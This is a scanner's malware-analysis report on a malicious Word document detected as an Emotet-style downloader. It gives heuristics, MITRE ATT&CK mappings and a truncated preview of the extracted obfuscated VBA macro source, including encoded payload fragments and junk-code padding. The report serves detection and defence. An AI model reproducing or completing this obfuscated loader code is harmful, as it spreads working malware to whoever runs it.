MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1140 Deobfuscate or Obfuscate Malicious Code
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The macro uses CreateObject and an AutoOpen function, indicating it's designed to execute automatically upon opening. The presence of a long encoded blob and the ClamAV detection signature 'Doc.Malware.Emodldr-10025032-0' strongly suggest the macro's purpose is to download and execute a second-stage payload, likely a downloader or dropper.
Heuristics 8
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44190 bytes |
SHA-256: e45165470d60b4574e17b0b6aae1ac991946483960d24d70fb2449f1485bf772 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 26 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "CjPvDKPoXlDw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "TwXGufNT"
Function wRnJFiczIE()
On Error Resume Next
Select Case oAzEB
Case 38546
wFjYZH = Hex(29258 - CSng(77965) - 88024 + ChrW(CWAbtC))
mKlaf = WPwkmj
End Select
UbiSV = ukDJfH("ZMAOQAzAGQANQA3ADUAOQAzAGMAYgBhADIAMQA5AGQAOABmADAAMgA0ADgANQA0AGEAMwA4AGIANgAxADcANgAwADkAZgBiADcAMAAxADMAYgAyAGMAZAAwADkAOQBmADQAMABkADkANQA3ADgAYgAzADcAYwAyAGQAOAA5ADYAYQBlAGMAOQBjAGUAz4jZ5%a", 3, 185)
Select Case tDUOoA
Case 12607
MwLbqv = Hex(2362 - CSng(69173) - 31131 + ChrW(uzhRr))
PSQMId = cIJzz
End Select
Select Case sLBsnP
Case 99369
ZdPQrT = Hex(81729 - CSng(98824) - 48973 + ChrW(oSnVd))
iujss = kDnGZz
End Select
dYNjvOldcN = ukDJfH("wDGAZQBiAGIAZQBiADEAYwBlADEAMQBhAGEAYgA1ADQAMAAxADcAMwBhADMANgAyADMAZQBhADIAYgA2AGIAMABkADcAZAA1AGEAZAA5ADMAMQA0ADIANQBhADIAYQA2AGUAMAA4ADMAZgBmADQAOABmAGYAMgA3AGUAMwBkADEAMQA3AGIAMwA5ADMAYgA1ADMAk6P", 4, 193)
Select Case aCYqk
Case 65767
DhKGB = Hex(64746 - CSng(70354) - 66146 + ChrW(LtXhdN))
jHBdsM = kurzwz
End Select
Select Case SvPvC
Case 79669
roimD = Hex(2127 - CSng(37830) - 68028 + ChrW(AvGrW))
icZzm = OqXZKD
End Select
vHGnTzEAIj = ukDJfH("tPl1oKZQAxADkANgAzADcAZgA5ADkAMwBiADMANwBmAGEAZgA5AGMAMABiADgAMgAzAGUAZQBmADMANwBjADEAMQA0ADgAMgBlAGQAZAAxADIAMQBjADEANAA5AGIAOAA2AGUAYgBkADUAZQA3AGUAYQBiADQAvk", 7, 152)
Select Case fMqliZ
Case 55820
FsoJzw = Hex(41599 - CSng(50425) - 45757 + ChrW(zwPMm))
FDkcw = NtztE
End Select
Select Case zDjXhO
Case 32219
RNjTNS = Hex(40574 - CSng(16509) - 14096 + ChrW(kICLt))
wzpdIR = ZKEsfB
End Select
izkNarwztkl = ukDJfH("zwnPADEAMgA5ADkANwBjADQANgA5AGQANQAwADMAYQA2AGIAMwAwADYAYQA4ADYANQAzADcANwBkAGYAYQRPv%j", 5, 78)
Select Case IPbobz
Case 53
bJPiKa = Hex(2305 - CSng(85274) - 51736 + ChrW(JkbkZn))
zfJIIZ = HKQVjO
End Select
Select Case ivFnnO
Case 12551
JQATDv = Hex(79222 - CSng(52145) - 69036 + ChrW(wlHla))
jNUNIl = kdIZiE
End Select
ACpiqnvi = ukDJfH("BF2EAPQA9AHwANwBiADUAOQBhADEAMgBhADUAZAAxAGQAMwBhADUAZQA5AGIAMgBiAGQANgA1AGYAMQA5ADMANAA2ADAAYwAyADEANAAxADYAYwBhADkAMgAzADcAZgA2ADcAMgA4AGQANgA0ADQAMAAyADkAOQA1ADUAv3To", 4, 162)
Select Case PhhNwj
Case 85071
NERFUw = Hex(94428 - CSng(55910) - 84527 + ChrW(UMDaut))
XhPpvW = WpzRE
End Select
Select Case zJnnF
Case 7056
rCGozj = Hex(76075 - CSng(22823) - 87969 + ChrW(IFSFVM))
iRzSu = bwsoY
End Select
ftaVjsVB = ukDJfH("rYNQBiAGMANAA0ADkANAA4ADAAMQAxADEANwBmADQANgA5AGMAYQjW4tSQ", 3, 50)
Select Case ttjQIw
Case 9341
iSCsV = Hex(39136 - CSng(22025) - 62916 + ChrW(BAiwa))
nEMwh = pFrOYz
End Select
Select Case lalWOj
Case 55348
FrwGIO = Hex(76388 - CSng(76973) - 53655 + ChrW(iiUDzA))
UQRVw = QHnzG
End Select
PrLui = ukDJfH("XWRjKSAYgA0AGEAOQBhAGUAMgAxAGMA'|coNvErttO-seCURESTRINg iFZ", 7, 50)
Select Case IPhjtw
Case 2939
wUkRNM = Hex(82219 - CSng(37906) - 25349 + ChrW(hblCt))
KdIYi = VRhGTX
End Select
Select Case tOhiv
Case 7940
hwiRq = Hex(54506 - CSng(50569) - 11948 + ChrW(wKsVu))
jmLTF = Awpaw
End Select
naGvU = ukDJfH("G0oGQBmADkAMQBiAGQAYwA0AGMAMwAyADYAMABlADMAOAA1AGEAMQBlADQAZQAwADgAMAA0ADYANwA0ADAANgA1ADQAMAAzADQAOAA3ADkAYgBmAGYAZAA4ADQAZABhAGMAMwA1ADEAZQA0AGIAOABjAGUAZQBjAGEAYwBjADYUvY", 6, 165)
Select Case SFmHa
Case 94015
iCNrkI = Hex(27962 - CSng(68125) - 86225 + ChrW(OiNPY))
vScwEh = prtEI
End Select
Selec
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.